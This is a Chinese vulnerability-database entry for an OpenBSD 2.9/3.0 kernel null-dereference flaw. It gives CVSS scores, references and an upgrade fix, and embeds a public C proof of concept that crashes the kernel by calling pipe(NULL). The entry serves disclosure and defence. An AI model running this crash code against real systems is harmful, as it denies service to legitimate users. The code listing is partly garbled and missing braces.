发布时间 :2001-12-31 00:00:00
修订时间 :2008-09-05 16:26:51

[原文]The uipc system calls (uipc_syscalls.c) in OpenBSD 2.9 and 3.0 provide user mode return instead of versus rval kernel mode values to the fdrelease function, which allows local users to cause a denial of service and trigger a null dereference.

[CNNVD]OpenBSD uipc系统调用(uipc_syscalls.c)漏洞(CNNVD-200112-251)

        OpenBSD 2.9和3.0版本的uipc系统调用(uipc_syscalls.c)提供用户模式返回而不是fdrelease函数的versus rval核心模式值。本地用户可以利用该漏洞导致服务拒绝并引起空引用。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:openbsd:openbsd:2.9OpenBSD 2.9
cpe:/o:openbsd:openbsd:3.0OpenBSD 3.0

- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(UNKNOWN)  XF  openbsd-retval-null-dos(7690)
(UNKNOWN)  MLIST  [OpenBSD] 20011202 Code that crashes kernel at will + proposed patch
(UNKNOWN)  BUGTRAQ  20011202 OpenBSD local DoS

- 漏洞信息

OpenBSD uipc系统调用(uipc_syscalls.c)漏洞
低危 未知
2001-12-31 00:00:00 2006-01-27 00:00:00
        OpenBSD 2.9和3.0版本的uipc系统调用(uipc_syscalls.c)提供用户模式返回而不是fdrelease函数的versus rval核心模式值。本地用户可以利用该漏洞导致服务拒绝并引起空引用。

- 公告与补丁


- 漏洞信息 (21167)

OpenBSD 2.x/3.0 User Mode Return Value Denial Of Service Vulnerability (EDBID:21167)
openbsd local
2001-12-03 Verified
0 Marco Peereboom
N/A [点击下载]

OpenBSD is a freely available implementation of the BSD Operating System. It is based on the NetBSD implementation.

Under some conditions, an application launched by a regular user on the system can cause a system crash. When an application on an OpenBSD system attempts to pipe a NULL value, a fault in the kernel causes the system to crash immediately.

This make it possible for a malicious local user to deny service to legitimate users of the system. 

/* obsd-crashme.c - by Marco Peereboom <> */
/* December 03, 2001 */

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <signal.h>
#include <stdarg.h>
#include <syslog.h>

/* globals */
int fd[8]; /* temp pipe file descriptors */
int fd_real[4]; /* real pipe's */

static int __DEBUG__  = 0;
static int __SYSLOG__  = 0;

void enable_debug(void)
         __DEBUG__ = 1;

void disable_debug(void)
         __DEBUG__ = 0;

void enable_syslog(void)
         __SYSLOG__ = 1;

void disable_syslog(void)
         __SYSLOG__ = 0;

void s_fprintf(FILE *file, const char *fmt, ...)
         va_list ap;

         if (__DEBUG__) {

                 va_start(ap, fmt);
                 vfprintf(file, fmt, ap);


         if (__SYSLOG__) {
                 va_start(ap, fmt);
                 vsyslog(LOG_INFO, fmt, ap);

void *s_malloc(size_t size)
         char serr[40]; /* can not allocate more mem so lets use this
ugly beast */
         void *p;

         if (__DEBUG__ || __SYSLOG__) {
                 s_fprintf(stderr, "PID=%-5i PPID=%-5i: malloc(%i)\n",
getpid(), getppid(), size);

         if ((p = malloc(size)) == NULL ) {
                 sprintf(serr,"PID=%i, Could not allocate memory",

         return p;

void s_perror(const char *str)
         char *buf;

         if (__DEBUG__ || __SYSLOG__) {
                 s_fprintf(stderr, "PID=%-5i PPID=%-5i: perror(%s)\n",
getpid(), getppid(), str);

         buf = s_malloc(11 + strlen(str)); /* PID=%-5i = 11 chars */
         sprintf(buf, "PID=%-5i %s", getpid(), str);


void s_pipe(int *fd)
         if (__DEBUG__ || __SYSLOG__) {
                 s_fprintf(stderr, "PID=%-5i PPID=%-5i: pipe(%x)\n",
getpid(), getppid(), (unsigned int)fd);

         if (pipe(fd) == -1)
                 s_perror("Could not create pipe");

int main(int argc, char **argv)

         fprintf(stderr, "Before pipe\n");
         s_pipe(NULL); /* test if s_pipe exits */
         fprintf(stderr, "Will never reach this\n");

         return 0;

- 漏洞信息

OpenBSD uipc System Calls Null Dereference Local DoS
Local Access Required Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

OpenBSD contains a flaw that may allow a local denial of service. The issue is triggered when a malicious attacker causes the sys_pipe() function to encounter a certain file descriptor error. This will cause sys_pipe() to dereference the user mode retval value instead of the rval kernel mode value. As retval is NULL, this will result in loss of availability for the platform.

- 时间线

2001-12-02 Unknow
2001-12-02 Unknow

- 解决方案

Upgrade to version 3.1 or higher, as it has been reported to fix this vulnerability. In addition, the creditee has released patches for some older versions. It is also possible to correct the flaw by implementing the following workaround: harden your OpenBSD system with the "Stephanie" TPE (trusted path execution) kernel patch.

- 相关参考

- 漏洞作者